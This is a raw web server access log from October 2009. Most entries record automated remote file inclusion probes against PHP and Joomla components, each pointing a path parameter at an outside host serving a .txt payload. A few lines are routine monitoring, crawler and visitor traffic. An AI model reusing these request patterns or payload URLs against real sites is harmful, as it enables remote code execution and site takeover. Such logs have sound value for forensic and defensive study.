12.46.124.72 - - [06/Oct/2009:01:01:02 -0400] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
12.46.124.72 - - [06/Oct/2009:01:01:02 -0400] "GET /logs/error_log.Q109071700%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:01:01:04 -0400] "GET /logs/access_log.Q109090300%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
213.0.87.125 - - [06/Oct/2009:01:01:11 -0400] "GET /logs/access_log.Q109070800%20%20/error.php?dir=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Oct/2009:01:01:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
90.185.249.111 - - [06/Oct/2009:01:01:36 -0400] "GET /logs/access_log.Q109071700%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
12.46.124.72 - - [06/Oct/2009:01:01:51 -0400] "GET /logs/access_log.Q109071700%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:01:01:54 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:01:01:54 -0400] "GET /logs/access_log.Q109062900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:01:01:54 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:01:01:54 -0400] "GET /logs/access_log.Q109092000%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:01:02:33 -0400] "GET /logs/access_log.Q109080800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:01:02:40 -0400] "GET /logs/access_log.Q109051600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:03:02 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:03:02 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:03:02 -0400] "GET /logs/access_log.Q109062900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:03:02 -0400] "GET /logs/access_log.Q109092000%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:03:02 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:03:02 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:03:02 -0400] "GET /logs/access_log.Q109062900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:03:02 -0400] "GET /logs/access_log.Q109092000%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:03:09 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:03:09 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:03:09 -0400] "GET /logs/access_log.Q109062900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:03:09 -0400] "GET /logs/access_log.Q109092000%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
74.6.22.152 - - [06/Oct/2009:01:03:10 -0400] "GET /logs/access_log.Q109092400 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.9.225.71 - - [06/Oct/2009:01:04:04 -0400] "GET /logs/access_log.Q109091000//include/mail.inc.php?skin_board_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
72.9.225.71 - - [06/Oct/2009:01:04:04 -0400] "GET /logs/access_log.Q109083100//include/mail.inc.php?skin_board_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
222.122.72.216 - - [06/Oct/2009:01:04:29 -0400] "GET /error.php?dir=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.122.72.216 - - [06/Oct/2009:01:04:29 -0400] "GET /logs/error.php?dir=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.122.72.216 - - [06/Oct/2009:01:04:29 -0400] "GET /logs/access_log.Q109051500/error.php?dir=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.122.72.216 - - [06/Oct/2009:01:04:34 -0400] "GET /logs/access_log.Q109070800/error.php?dir=http://Theox.fileave.com/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:01:05:14 -0400] "GET /logs/access_log.Q109091500/mail.inc.php?skin_board_path=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.55.90.178 - - [06/Oct/2009:01:05:17 -0400] "GET /logs/index.php?seccion=http://www.sjobergsbygg.nu/new/cmd????? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
74.55.90.178 - - [06/Oct/2009:01:05:17 -0400] "GET /index.php?seccion=http://www.sjobergsbygg.nu/new/cmd????? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
64.27.9.117 - - [06/Oct/2009:01:05:26 -0400] "GET /logs/access_log.Q109062900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:01:05:26 -0400] "GET /logs/access_log.Q109092000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
187.6.104.107 - - [06/Oct/2009:01:05:29 -0400] "GET /logs/error_log.Q109071700%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
187.6.104.107 - - [06/Oct/2009:01:05:29 -0400] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
187.6.104.107 - - [06/Oct/2009:01:05:29 -0400] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:05:59 -0400] "GET /logs/access_log.Q109062900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:05:59 -0400] "GET /logs/access_log.Q109092000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
121.124.127.95 - - [06/Oct/2009:01:06:03 -0400] "GET /logs/access_log.Q109070700//administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.abdreality.cz/js/id.txt???%0D?? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
121.124.127.95 - - [06/Oct/2009:01:06:03 -0400] "GET /logs//administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.abdreality.cz/js/id.txt???%0D?? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
121.124.127.95 - - [06/Oct/2009:01:06:03 -0400] "GET //administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.abdreality.cz/js/id.txt???%0D?? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
121.124.127.95 - - [06/Oct/2009:01:06:03 -0400] "GET /logs/error_log.Q109051200//administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.abdreality.cz/js/id.txt???%0D?? HTTP/1.1" 404 285 "-" "libwww-perl/5.79"
209.59.12.99 - - [06/Oct/2009:01:06:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
187.6.104.107 - - [06/Oct/2009:01:06:18 -0400] "GET /logs/access_log.Q109071700%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:01:06:20 -0400] "GET //index.php?option=com_akobook&Itemid=&func=&mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:01:06:20 -0400] "GET /logs//index.php?option=com_akobook&Itemid=&func=&mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:01:06:20 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_akobook&Itemid=&func=&mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:06:21 -0400] "GET /logs/access_log.Q109062900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:06:21 -0400] "GET /logs/access_log.Q109092000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:01:06:26 -0400] "GET /logs/access_log.Q109062100//index.php?option=com_akobook&Itemid=&func=&mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:06:39 -0400] "GET /logs/access_log.Q109062900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:01:06:46 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:01:06:46 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:01:06:47 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:01:06:49 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:01:06:50 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:01:06:50 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:01:06:50 -0400] "GET /logs/access_log.Q109091700%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:06:54 -0400] "GET /logs/access_log.Q109092000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:01:06:58 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:01:06:58 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:01:06:58 -0400] "GET /logs/access_log.Q109091700%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:01:07:02 -0400] "GET /logs/access_log.Q109091700//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:01:07:07 -0400] "GET /logs/access_log.Q109091700//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:07:18 -0400] "GET /logs/error_log.Q109052800/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
81.222.131.98 - - [06/Oct/2009:01:07:52 -0400] "GET /logs/error_log.Q109071700//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
81.222.131.98 - - [06/Oct/2009:01:07:59 -0400] "GET /logs/access_log.Q109071700//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
68.3.227.156 - - [06/Oct/2009:01:09:09 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; Zune 3.0; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
68.3.227.156 - - [06/Oct/2009:01:09:09 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; Zune 3.0; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
68.3.227.156 - - [06/Oct/2009:01:09:10 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; Zune 3.0; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
68.3.227.156 - - [06/Oct/2009:01:09:10 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; Zune 3.0; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
220.125.237.35 - - [06/Oct/2009:01:09:33 -0400] "GET /logs/access_log.Q109091500/mail.inc.php?skin_board_path=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
90.185.249.111 - - [06/Oct/2009:01:09:45 -0400] "GET /logs/error_log.Q109071700//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
90.185.249.111 - - [06/Oct/2009:01:09:54 -0400] "GET /logs/access_log.Q109071700//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
87.139.66.104 - - [06/Oct/2009:01:10:05 -0400] "GET /logs//receipt/lib/_private//?_zb_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 226 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
87.139.66.104 - - [06/Oct/2009:01:10:05 -0400] "GET //receipt/lib/_private//?_zb_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
222.73.17.7 - - [06/Oct/2009:01:10:16 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:01:10:21 -0400] "GET /logs/access_log.Q109091700//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:01:10:21 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:01:10:29 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:01:10:29 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:01:10:29 -0400] "GET /logs/access_log.Q109091700//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:10:34 -0400] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:10:34 -0400] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:10:34 -0400] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:10:34 -0400] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:10:38 -0400] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:10:38 -0400] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:10:38 -0400] "GET /logs/access_log.Q109051500/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:10:38 -0400] "GET /logs/access_log.Q109051500/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:10:39 -0400] "GET /logs/access_log.Q109051500/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Oct/2009:01:11:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.143.3.188 - - [06/Oct/2009:01:11:21 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
174.143.3.188 - - [06/Oct/2009:01:11:21 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Microsoft Pocket Internet Explorer/0.6"
174.143.3.188 - - [06/Oct/2009:01:11:21 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
174.143.3.188 - - [06/Oct/2009:01:11:21 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
61.129.64.174 - - [06/Oct/2009:01:13:08 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
61.129.64.174 - - [06/Oct/2009:01:13:09 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.129.64.174 - - [06/Oct/2009:01:13:14 -0400] "GET /logs/access_log.Q109083100%20%20//include/mail.inc.php?skin_board_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.195.112.120 - - [06/Oct/2009:01:13:29 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.225.145.23 - - [06/Oct/2009:01:13:30 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.nanuquevirtual.com/idr?? HTTP/1.1" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
67.225.145.23 - - [06/Oct/2009:01:13:30 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.nanuquevirtual.com/idr?? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
67.225.145.23 - - [06/Oct/2009:01:13:30 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.nanuquevirtual.com/idr?? HTTP/1.1" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
67.195.112.120 - - [06/Oct/2009:01:13:30 -0400] "GET /logs/ HTTP/1.0" 200 20714 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.55.227.178 - - [06/Oct/2009:01:13:38 -0400] "GET /logs/access_log.Q109062100%20%20//index.php?option=com_akobook&Itemid=&func=&mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.129.64.174 - - [06/Oct/2009:01:13:40 -0400] "GET /logs/access_log.Q109091000%20%20//include/mail.inc.php?skin_board_path=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
